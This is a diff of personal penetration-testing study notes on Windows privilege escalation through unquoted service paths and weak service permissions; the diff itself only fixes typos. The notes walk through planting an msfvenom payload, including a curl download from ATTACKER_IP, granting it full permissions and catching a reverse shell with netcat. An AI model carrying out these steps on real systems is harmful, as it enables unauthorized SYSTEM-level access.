NischalDaCoder/vapt-learning/notes/VAPT_Notes.md

   		> sc qc "SERVICENAME"

-  - We already know the structure these queires throw out so, here we adde the "" quote to the service name , so the paramter "BINARY_PATH_NAME" should show "PATH\TO\THE\SERVICE.exe".
+- We already know the structure these queires throw out so, here we added the "" quote to the service name , so the paramter "BINARY_PATH_NAME" should show "PATH\TO\THE\SERVICE.exe".
 If the binary path does not has the "" quote, then, this means we can exploit this unquoted service path.

 - This has to do with how the command prompt parses a command.
 Usually, when we send a command, spaces are used as argument seperators unless they are part of the quoted string.
 So, suppose if a service has binary path C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe without the quote, then, the SCM tries:

-   		 -> First searches C:\\MyPrograms\\Disk.exe, if it runs the service will run this executable
+    - First searches C:\\MyPrograms\\Disk.exe, if it runs the service will run this executable

-		-> If it does not exist, it will search C:\\MyPrograms\\DiskSorter.exe.
+	- If it does not exist, it will search C:\\MyPrograms\\DiskSorter.exe.

-		-> If that also does not exist, then it will search for C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe.
+	- If that also does not exist, then it will search for C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe.

 - So, the problem with this is if an attacker creates any of the executables that are searched for before the expected service executable, then they can force the service to run an arbitrary executable.

 - Most of service executables is installed under C:\Program Files or C:\Program Files (x86) by default, that cannot be writable by unprivileged users.
 But, some installers change the permissions on the installed folder making these services vulnerable.
-Even some adminsitrator might decide to install the service binaries in a non-default path.
+Even some adminsitrators might decide to install the service binaries in a non-default path.
 So, if such path is world-writable, the vulnerability can be exploited.

 - Assuming the example provided above of the binary path, We can check this using :

     	> icacls c:\MyPrograms

-	-> We could look for BUILTIN\USERS group, where the permissions are written for all users of the Windows system.
+	- We could look for BUILTIN\USERS group, where the permissions are written for all users of the Windows system.
 If we can see (AD) and (WD) privileges, this means the user can create subdirectories and files in this location.
 So, an attacker can create an exe-service payload in this path so that the SCM tries the attackers payload executable before teaching the real service executable.
 The above method could be used to generate and serve the payload in the windows server.

 			$ msfvenom -l <Payload> <Options>

 			$ python -m http.server

 		On windows:

 			> curl http://ATTACKER_IP:8000/svc.exe -o svc.exe

-	-> Then, we can move this executable to the path of the binary which the SCM will reach first than the actual one.
+	- Then, we can move this executable to the path of the binary which the SCM will reach first than the actual one.

 			> move C:\Users\target\svc.exe C:\MyPrograms\Disk.exe

-	-> Grant Everyone full permission so it can be executed by service
+	- Grant Everyone full permission so it can be executed by service

 			> icacls C:\MyPrograms\Disk.exe /grant Everyone:F

-	 -> Then, we can restart the service or wait for it to be restarted.
+	 - Then, we can restart the service or wait for it to be restarted.

   		In Attacking Machine:

     		$ nc -lvnp 4444 (should be the port that is configured in the payload)

     	In Windows:

 			> sc stop "disk sorter enterprise"

 			> sc start "disk sorter enterprise"

 	- As a result, we will get a reverse shell on the attacking machine of the privileged configured user that could give attacker more freedom inside the system

  ### Insecure Service Permissions:

  - We still have a slight chance of taking advantage of a service if the service's executable DACL is well configured and the service binary path is rightly quoted.
 We can check if the service DACL can allow us to modify the configuration of a service (not the service's executable DACL), then we could reconfigure the service.
 What this does is, it allows us to point to any executable we needs and run it with any account, including SYSTEM itself.

- - To cehck for a service DACL, we could use Accesschk from the Sysinternals suite.
+ - To check for a service DACL, we could use Accesschk from the Sysinternals suite.

    		> accesschk.exe -qlc SERVICE_NAME